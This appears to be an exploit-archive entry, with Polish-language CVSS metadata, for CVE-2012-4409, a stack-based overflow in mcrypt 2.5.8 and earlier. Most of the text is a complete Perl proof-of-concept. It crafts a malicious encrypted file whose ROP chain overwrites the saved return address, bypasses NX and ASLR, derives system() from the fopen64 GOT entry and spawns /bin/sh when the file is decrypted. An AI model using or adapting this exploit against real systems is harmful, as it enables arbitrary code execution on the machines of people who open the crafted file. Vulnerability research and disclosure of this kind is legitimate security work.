mcrypt <= 2.5.8 STACK based overflow

Credit: Tosh
Risk: High
Local: Yes
Remote: No
CWE: CWE-119

Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#!/usr/bin/perl # Title : mcrypt <= 2.5.8 STACK based overflow # Date : 23/11/2012 # Exploit Author : Tosh # CVE : CVE-2012-4409 # Patch : # Tested on : Archlinux 3.6.6-1, without SSP # This script exploit a stack based overflow in mcrypt <= 2.5.8. # It bypass NX and ASLR protections, but no SSP. # This exploit craft a crypted file and arbitrary code may be executed if the file is decrypted with a vulnerable version # of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c. See the CVE details or the patch for more # informations. # Payload must be adjusted on others plateforms, here is just a Proof of Concept :) use strict; use warnings; my $filename = ''; my $file; my $payload; print "[+] Build payload.\n"; $payload = payload(); print "[+] Build file.\n"; $file = build_file($payload); print "[+] Writing $filename.\n"; write_file(); print "[+] DONE.\n"; sub write_file { die("[-] Can't open $filename : $!\n") unless(open F, '>', $filename); print F $file; close F; } sub build_file { # magic $file .= "\x00m\x03"; # flags $file .= pack('C', 1 << 6); # algorithm $file .= "H\@Ck3d\x00"; # keysize $file .= pack('S', 0xdead); # mode $file .= "h\@cK3d\x00"; # keymode $file .= "H\@CK3D\x00"; # sflags $file .= "\xff"; # payload $file .= $_[0]; return $file; } sub payload { my $saved_eip_off = 0x71; # Buffer len for overwrite saved EIP my $v_local_1 = 0x0805b000; # Local variable 1 overwriten my $v_local_2 = 0x08048007; # Local variable 2 overwriten my $ret_sled = 5; # Offset between saved EIP and local variables my $strcpy_plt = 0x080499f0; # strcpy@plt address my $fopen64_got = 0x0805b1c8; # fopen64 got entry my $system_off = 0xfffd6b30; # fopen64 - system my $w_mem = 0x0805b000; # writable memory, without ASLR my $pop2_ret = 0x08055a63; # pop; pop; ret my $ret = 0x0805a5ed; # ret my $pop_ebx = 0x08056186; # pop ebx; ret my $pop_edi = 0x08053460; # pop edi; ret my $xchg_eax = 0x080517a4; # xchg eax, edi; ret my $add_eax = 0x0804dabf; # add eax,[ebx-0x2776e73c]; pop ebx; ret my $call_eax = 0x0804b357; # call eax; leave; ret my $payload; $payload .= "A"x$saved_eip_off; $payload .= pack('L', $ret) x $ret_sled; $payload .= pack('L', $pop2_ret); $payload .= pack('L', $v_local_1); $payload .= pack('L', $v_local_2); # Copy "/bin/" in +W memory $payload .= pack('L', $strcpy_plt); $payload .= pack('L', $pop2_ret); $payload .= pack('L', $w_mem + 0x00); $payload .= pack('L', 0x08057fc2); # Copy "sh" + "\x00" in +W memory $payload .= pack('L', $strcpy_plt); $payload .= pack('L', $pop2_ret); $payload .= pack('L', $w_mem + 0x05); $payload .= pack('L', 0x08048bab); # Calc system() address with fopen64 GOT entry $payload .= pack('L', $pop_ebx); $payload .= pack('L', $fopen64_got + 0x2776e73c); $payload .= pack('L', $pop_edi); $payload .= pack('L', $system_off); $payload .= pack('L', $xchg_eax); $payload .= pack('L', $add_eax); $payload .= "HaCk"; # Call system("/bin/sh") $payload .= pack('L', $call_eax); $payload .= pack('L', $w_mem); die("[-] Payload too long !\n") if(length $payload > 0xfe); return $payload; }


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